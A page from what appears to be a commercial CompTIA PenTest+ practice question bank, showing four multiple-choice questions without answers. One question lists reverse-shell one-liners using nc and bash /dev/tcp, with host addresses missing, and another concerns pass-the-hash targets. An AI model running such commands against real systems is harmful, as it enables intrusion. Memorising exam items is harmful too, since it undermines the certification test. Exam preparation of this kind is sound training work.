New Year Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

PT0-001 Questions Bank

Page: 7 / 11
Total 294 questions

CompTIA PenTest+ Exam Questions and Answers

Question 25

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Options:

A.

perl -e ‘ use SOCKET’; $i=’; $p=’443;

B.

ssh superadmin@ -p 443

C.

nc -e /bin/sh 443

D.

bash -i >& /dev/tcp// 443 0>&1

Question 26

During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

Options:

A.

Operating system Windows 7

Open ports: 23, 161

B.

Operating system Windows Server 2016

Open ports: 53, 5900

C.

Operating system Windows 8 1

Open ports 445, 3389

D.

Operating system Windows 8

Open ports 514, 3389

Question 27

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

Options:

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Question 28

A security assessor completed a comprehensive penetration test of a company and its networks and systems.

During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's

intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor,

although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of

impact?

Options:

A.

Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and

digital signing.

B.

Implement new training to be aware of the risks in accessing the application. This training can be

decommissioned after the vulnerability is patched.

C.

Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the

application to company staff after the vulnerability is patched.

D.

Require payroll users to change the passwords used to authenticate to the application. Following the

patching of the vulnerability, implement another required password change.

Page: 7 / 11
Total 294 questions